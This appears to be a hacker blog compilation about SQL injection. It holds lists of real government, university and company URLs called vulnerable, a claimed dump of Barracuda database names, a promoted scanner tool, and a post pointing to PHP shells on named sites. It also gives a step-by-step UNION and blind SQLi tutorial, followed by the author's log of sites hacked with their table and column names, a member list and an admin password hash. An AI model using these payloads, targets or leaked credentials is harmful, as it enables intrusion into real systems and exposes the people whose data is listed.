sqli

Here I am, re-posting the vulnerabilities from what was previously on my website. These people really need to tighten up security.

Government:

http://www.srs.fs.usda.gov/news/view.php?id=463

http://northadams-ma.gov/index.php?nav_id=105

http://score.dnr.sc.gov/deep.php?subject=10

http://www.energy.ca.gov/contracts/RFP_400-10-401/CompEnergyEffcyPrgm/seemail.php?ID=6

http://www.bage.rs.gov.br/haras_visualiza.php?id=4

http://www.iz.sp.gov.br/publica.php?id=168

http://web.deporte.gov.ar/picND.php?id=1150

http://islamicaffairs.gov.mv/dh/f/fridayF.php?id=19

http://ciudaddesanluis.gov.ar/imprime_g.php?id_gace=765

http://www.jzmpc.gov.cn/rdzcok.php?id=30

http://www.portoseguro.ba.gov.br/carnaval2010/postagem.php?id=2

http://www.dapr.gov.ma/impressionResultatAo.php?idResultat=17

http://www.danzhou.gov.cn/tzdz/index_p.php?id=92


Education:

http://www.kishwaukeecollege.edu/visitors_friends/policy_manual/PersonnelGeneral.php?page=309

http://www.montana.edu/bobcats/mclubviewmember.php?id=70

http://www.ncsu.edu/human_resources/staff/member.php?id=18

https://mice.cs.columbia.edu/getTechreport.php?techreportID=483

Full Disclosure:Barracuda Networks Hacking via SQL Injection.

A disclosure by: fdf (hmsec.org cr3w)

Shout to: Sorcerer, Kill_Tech, Y0y0, Sherina84, Tr4nsltr, Upxilon, Ghimau, otak and all Malaysian Hackers

Barracuda Networks Inc. combines premises-based gateways and software, virtual appliances, cloud services, and sophisticated remote support to deliver comprehensive content security, data protection and application delivery solutions. The company’s expansive product portfolio includes offerings for protection against email, Web and IM threats as well as products that improve application delivery and network access, message archiving, backup and data protection.

Barracuda Networks’ product portfolio includes: Barracuda Spam & Virus Firewall, Barracuda Web Filter, Barracuda IM Firewall, Barracuda Web Application Firewall, Barracuda SSL VPN, Barracuda Load Balancer, Barracuda Link Balancer, Barracuda Message Archiver, Barracuda Backup Service, and the BarracudaWare software portfolio. Combining its own award-winning technology with powerful open source software, Barracuda Networks solutions deliver easy to use, comprehensive security, networking, and data protection products. Barracuda Central, an advanced 24x7 operations center manages data centers for all service-based offerings and works to continuously monitor and block the latest Internet threats.

LIST OF DATABASES:

new_barracuda

information_schema

Marketing

barracuda

black_ips

buniversity

bware

co-op

collections

cuda_car

cuda_stats

dev_new_barracuda

igivetest

igivetest_bk1_aug10

igivetestsucks

kb_solutions

leads

mysql

new_barracuda

new_barracuda_archive

php_live_chat

phpmyadmin


DB NAME: NEW_BARRACUDA

TABLE NAME: DEAL_REG

DATA COUNT: Count(*) of new_barracuda.deal_reg is 17549

SAMPLE DATA:

 


 

 DB NAME: NEW_BARRACUDA

TABLE NAME: CMS_LOGINS

DATA COUNT: Count(*) of new_barracuda.cms_logins is 251

DATA:

 

DB NAME: NEW_BARRACUDA

TABLE NAME: BUNIVERSITY_USERS

DATA COUNT: Count(*) of new_barracuda.buniversity_users is 35

DATA:

DB NAME: MYSQL

TABLE NAME: USER

DATA COUNT: Count(*) of mysql.user is 23

DATA:

DB NAME: PHP_LIVE_CHAT

TABLE NAME:  CHAT_ADMIN

DATA COUNT: Count(*) of php_live_chat.chat_admin is 30

DATA:

scmagazineus.com
Oracle's MySQL.com hacked via SQL injection

File this one under ironic:

Hackers over the weekend compromised Oracle’s MySQL.com customer website via SQL injection and posted a list of usernames and passwords online.

Two Romanian hackers using the aliases “TinKode” and “NeOh” have taken responsibility for the attack and said they exploited an SQL injection flaw to break into the web servers hosting MySQL.com, a website for the popular open source database product.

The site was first outed as vulnerable in a Sunday post to the Full Disclosure mailing list by a user with the alias “Jackh4xor,” who included a list of MySQL.com internal databases and tables along with usernames and password hashes. Later on Sunday, TinKode and NeOh posted a dump of information extracted from MySQL, including the cracked passwords of users, to the text-sharing site Pastebin.

Looking at some of the cracked passwords, it’s clear that their password policies were also quite porous. According to the Sucuri Security blog, the administrative password to the MySQL Blog was 4 digits:

What is worse is that they also posted the password dump online and some people started to crack it already. Some of the findings are pretty bad, like the password used by MySQL’s Director of Product Management, it is only 4 numbers (6661) long. Multiple admin passwords for blogs.mysql.com were also posted.

SEKURITY SQLi Scanner

External image

1. Enter the dork list path, eg. “C:\dorks.txt”. The list should be in the format:

dork1.php?id=

dork2.php?id=

dork3.php?id=

etc…

2. Enter the amount of pages per dork to search, there are 10 results per page, max pages is 100.

3. Enter a domain to search, for example “.co.uk”, “.nl”, “.gov”, “.edu”, etc. (blank if any).

4. Enter a keyword for example “shop”, “paypal”, “xbox”, etc.  (blank if any).

5. Set the timeout to something reasonable, ~5000 (= 5 seconds) is efficient, something too low will be fast however will not bring back good results.

4. The yellow writing appearing are the crawled links.

5. Red writing showing as scanning are the invulnerable links, green are vulnerable.

6. All vulnerable links are stored in the Application Path.

Download: http://min.us/mdh8bQM

#OpCondorLibre

akce pod nazvem #OpCondorLibre probiha prave dnes v podstate v tuhle chvili. akce probiha v ekvadoru a je namirena proti cenzure medii. to je ve strucnosti receno samozrejme, ale bohuzel neznam uplne pozadi. vic snad zde http://www.youtube.com/watch?v=BvaLJVy8xcA.

obecne jde o masivni ddos utok pomoci LOIC nastroju (viz. http://en.wikipedia.org/wiki/LOIC) v soucinosti s vice ci mene zdatnymi hackery nebo chcete-li lidmi co umi pouzit nastroje na hledani bezpecnostnich der jako sqli vulnerability a podobne. tento postup je podle vseho dost obvykly a pouziva se i v dalsich akcich pod hlavickou (blbej termin ale nevim jak to rict) #Anonymous jako #OpChile a podobne. Pocitam ze do rana pripravim nejaky vetsich soupis uspechu akce. Prozatim uplne nejnovejsi prirustek.

Nekomu se podarilo nabourat do webu jedne telekomunikacni firmy http://telconet.net a jednoho deniku http://www.vistazo.com. Oba zrejme diky sqli vulnerability nebo sql injection. Pokud zkusite dodat za domenu obou webu /in.php tak se dostanete do jakehosi php Shellu ktery diky bezpecnostni dire dovoluje hrat si se samotnym serverem :). uvidime co prijde dalsiho. v ty jizni americe to docela jede.

youtube

Windows MySQL UDF Exploitation by Hood3dRob1n

https://github.com/Hood3dRob1n/SQLi

ehackingnews.com
New #SQLi prevention system left open a vulnerability, says #PKNIC
External image
 Few days back, Pakistani Top Level domains including Google , Yahoo, Msn and more sites defaced by Turkish Hackers.  Following that incident , a Pakistani hacker contacted us with a report regarding the vulnerability resides in the website.  We have immediately notified about the vulnerabilities to PKNIC.

Today, PKNIC released the official statement that confirms the security breach. In an email sent to us, PKNIC informed us that the vulnerability has been fixed over the weekend. 

“PKNIC became aware of a vulnerability in one of its systems which caused a total of four user accounts to be breached on Friday evening 23rd November, impacting nine DNS records, out of a total of around fifty thousand. That led to several website addresses to be redirected to a blank message page for a few hours. Several of these websites were mirrors of global sites such as google.pk, ebay.pk, etc.” The official statement reads.

The changes caused by the incident were reverted within a few hours, by the PKNIC team, by late Friday night. The Team sent notification to affected accounts after the scope of the incident was identified.
The management said that website doesn’t store credit card or similar financial information in its database.

“PKNIC servers were not hacked and continued to operate normally. However, the vulnerability briefly exposed some information which could be used to modify the DNS for the four accounts.”

PKNIC’s executive chairman Ashar Nisar said that they ’ve applied a new complex system to prevent from SQL injection attacks before the breach itself. However, the new system inadvertently left open a vulnerability, under certain obscure conditions and contexts, that was used in the recent security breach.

“As a result, in addition to a thorough investigation of our entire site and systems, we reverted to the simpler more robust model of filtering out everything unknown, instead of continuing to use the new system that had been tailored to the latest threats using more complicated algorithms.” He said.

The PKNIC team confirmed that there was no interruption to the root DNS or any other services provided by PKNIC. Additionally, other than the sites under the four accounts and seven DNS servers, all other .PK websites were unaffected and continued to operate normally.

Invitation for Friendly Hackers:
To improve their web security, PKNIC plan to invite hackers to test their website security.  They’ve planned to announce the reward program for hackers who find vulnerability , as is done by leading global companies, like Google and others.
Websites I've hacked with SQLi and tutorial [Rebel :p]

How To SQL Injection:
Check vulnerability by putting a apostrophe at the end of the URL
{Space} order by (number)– (until MySQL error)
(Replace ID= With ID=(Negative number or null) union all select (Columns in order IE: 1,2,3,4,5)–
Same thing as above just replace the number that is at the top with @@Version (If it is below 5 you need blind SQL Injection
Replace @@Version with concat/group_concat(table_name) and at end of list from information_schema.tables where table_schema=database()–
Get the table names from above ^
Replace from step four (table_name) with (column_name) and information_schema.tables with information_schema.columns
Replace where (column_name) with ({The column you want}{More if you want but between them use 0x3a}) and all the stuff after from with the table
How To Blind SQL Injection:
1] Test by putting AND 1=1 at the end of the URL (This is always true)
2] Now to check if it is vunerable put AND 1=2 (It is vunerable if pictures,text, etc is missing)
3] Now put: and substring(@@version,1,1)=4 [To check if the version is version four if it isn’t true then change the four to a higher number]
4] Put this at the end: and (select 1)=1 [This will test subselect if the webpage loads right it works]
5] Put this: and (select 1 from mysql.user limit 0,1)=1 [Check’s if you have access to mysql.user(If the page loads right you have access)]
6] Guess tables with: and (select 1 from {Table Guess} limit 0,1)=1 [Guess the table (If page loads right it exists, if content disappears it doesn’t]
7] Guess columns with: and (select substring(concat(1,{Column guess}),1,1) from {Table from last step} limit 0,1)=1 [Guess the column (If page loads right it exists, if content disappears it doesn’t]
8] Get data from database with: and ascii(substring((SELECT concat({Column from before},0x3a) from {Table form step 6} limit 0,1),1,1))>80 [0x3a is a colon to go inbetween the username and password(Increase the number after the greater than sign until the page loads wrong)]
9] Change to: and ascii(substring((SELECT concat({Column name},0x3a) from {Table name} limit 0,1),2,1))>99 [99 should be the number from before] [If the page loads successfully make the number (99 or whatever) higher if it is false then lower it]
~
http://www.pushingpetals.com:
Columns: 12
Union (All): 2
Version: 5.1.71-log
Table Names: creb conference,customer,localpushingpetalsorders,members,pushingpetals,pushingpetalsorders,user
Column Names: ticket,first name,last name,phone,email,company,website,registration id,twitter,cust_id,name,address,id,name,description,small,medium,large,smallimg,largeimg,type,other,other2,other3,id,username,password,id,firstName,lastName,cellNumber,workNumber,emailHome,emailWork,relationshipStatus,spousesFirstName,homeAddress,workAddress,specialAddres
~
www.pch-workshop.com;
Columns; 4
www.cosspak.org;
Columns: 6
Union (All): 2
Version: 5.5.10
Table Names:
ahk,bibliography,books,bulletin,contents,institutions,members,monograph,news,theses
Column Names:
ahk_id,ahk_tit,ahk_det,bib_id,bib_name,bib_by,bib_content,border,boo_id,boo_name,boo_intro,boo_book,boo_author,border,bulletinid,bulletintitle,bulletin,con_id,con_name,con_content,con_order,ins_id,ins_type,ins_name,ins_address,ins_contact,mem_id,mem_name,mem_deg,mem_pho,mem_phr,mem_spe,mem_pos,mem_fax,mem_joi,mem_city,mem_type,mon_id,mon_a
ID:Member; 13:Zarina Salamat (Dr.),12:Iftikhar N. Hasan (Dr.),11: Anjum Riyazul Haque (Dr.),10:Kamran Ahmad (Dr.),533:RiaAhmed Jakhrani,394:Tamknat Fatima,395:Z. A. Qureshi (Dr.),15:Fateh Muhammad Chaudhry (Dr.),16:Muzaffar Mahmood Qureshi,17:Najma Najam (Dr.),460:Raja Ehsan Aziz,19:Zafar Ishaq Ansari (Dr.),20:Farzana Bari (Dr.),21:Anwar H. Siddiqui (Dr.),22:S. Zulfiqar Gilani (Dr.),23:Zafarullah Khan,24:Sabeeha Syed (Dr.),25:Samina Ahmed (Dr.),26:Anwar Nasim (Dr.),27:Muhammad Khalid Masud (Dr.),28:Fouzia Saeed (Dr.),29:IjaShafi Gilani (Dr.),30:IjaHussain (Dr.),31:Noor Fatima,32:Andrew Wilder (Dr.),33:Ali Tauqir Sheikh,34:Hans Frey (Dr.),35:PerveTahir (Dr.),36:Fateh Muhammad Malik (Prof.),37:Asad Zaman (Dr.),38:Muhammad Perve(Dr.),39:M. N. Qureshi (Dr.),40:Fazal Rahim Khan (Dr.),168:Tahir Masood,41:Muhammad Iqbal Saif (Dr.),42:Khurram Qadir (Dr.),43:Shaheen Akhtar,392:Centre for Peace and Development Initiatives (CPDI),46:Faqir Hussain (Dr.),47:KaniF. Yusuf (Dr.),48:M. Azam Chaudhary (Dr.),49:Naveed-i-Rahat
~
www.indianewsheadlines.com;
Columns: 4
Union (All): 3
Version: 5.1.60
Tables: dug_admins,dug_amenu,dug_buries,dug_cats,dug_cdigs,dug_comm,dug_cron,dug_digs,dug_feeds,dug_feeds_log,dug_friends,dug_html,dug_inbox,dug_logs,dug_settings,dug_stories,dug_tags,dug_usergroups,dug_users
Columns:
admin_id
username
password
menu_id
sort_id
parent_id
menu_title
menu_icon
menu_url
menu_target
menu_desc
story_id
user_id
cat_id
parent_id
cat_title
cat_stories
cat_subs
comment_id
user_id
user_ip
story_id
time
dig
comment_id
parent_id
story_id
user_id
user_name
comment_desc
comment_time
comment_digs
story_id
digs
story_id
user_id
user_ip
time
feed_id
feed_url
feed_lastch
feed_cat
feed_period
feed_user
feed_id
feed_hash
feed_time
friend_id
user_id1
user_id2
html_id
template
html_title
html_content
message_id
message_from
message_to
message_date
message_subject
message_body
message_read
log_id
log_date
log_summary
log_details
setting_id
setting_file
setting_title
setting_name
setting_type
setting_options
setting_value
setting_display
story_id
user_id
user_name
story_url
story_title
story_desc
story_cat
story_rating
story_digs
story_buries
story_time
story_comments
story_last5
story_thumb
story_prom
story_prom_date
story_tags
tag_id
story_id
tag_phrase
tag_time
group_id
group_removable
group_name
group_dig
group_cdig
user_id
group_id
status
username
password
email
forgot
remember
avatar
commentst
Admin Login: spideradmin:ffa7103b9201fa8b98ddcf4014ddb5bd
~
www.mikro.co.il;
Columns: 9
Union (All): 3
Version: 5.1.43-community
Tables: micro_cms
Columns: cmsId
~
www.aspanaex.org;
Columns: 1
~
woodsmanbushcraft.co.uk;
Columns: 8
Union (All):
~
www.kenwright.com;
Columns: 10
Union (All): 6
Version: 5.0.95-log
Tables: kenw_content,kenw_template
Columns: id
~
www.arche-noah.at;
Columns: 5
~
www.eastodissa.ac.in;
Columns: 7
Union (All): 5
Version: 5.1.68-community
Tables: est_achievement
Columns: ach_id
~
www.a-k-a.net;
Columns: 32
Union (All): 2
Version: 5.0.96-log
Tables: tbkadvanage
Columns: id
~
http://www.kbnusa.com;
Columns: 20
Union (All): 5
~
http://www.micatrone.se;
Columns: 8
Union (All):
~
http://www.wildflowersmich.org;
Columns: 8
Union (All):
~
http://deeneislam.com;
Columns: 8
Union (All):
~
http://www.clanwilliam.info;
Columns: 7
Union (All): 2
Version: 5.1.66-0+SQUEEZE1-LOG
Tables: TBLESTABLISHMENT,TBLESTTYPE,TBLEVENTS,TBLPAGE,TBLSPECIALS,TBLSTATS,TBLSTATSREPORT,TBLSTATSREPORTFAILED,TBLSTATSREPORTPROCESSED,TBLUSAGE
~
http://www.touringasiaonline.com/language_italy/hotel_detail.pop.php?id=620; {BSQLi}
Columns: 5
~
http://exchange.abnormalcycles.com/pop.php?id=683;
Columns: 18

Google Dorks

We call them ‘googledorks’: Inept or foolish people as revealed by Google. Whatever you call these fools, you’ve found the center of the Google Hacking Universe!

Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.
Once you’re familiar with them, you can incorporate security measures for your own development. I gathered some more information and put it together. Off course this article is for educational purposes only.

Keep reading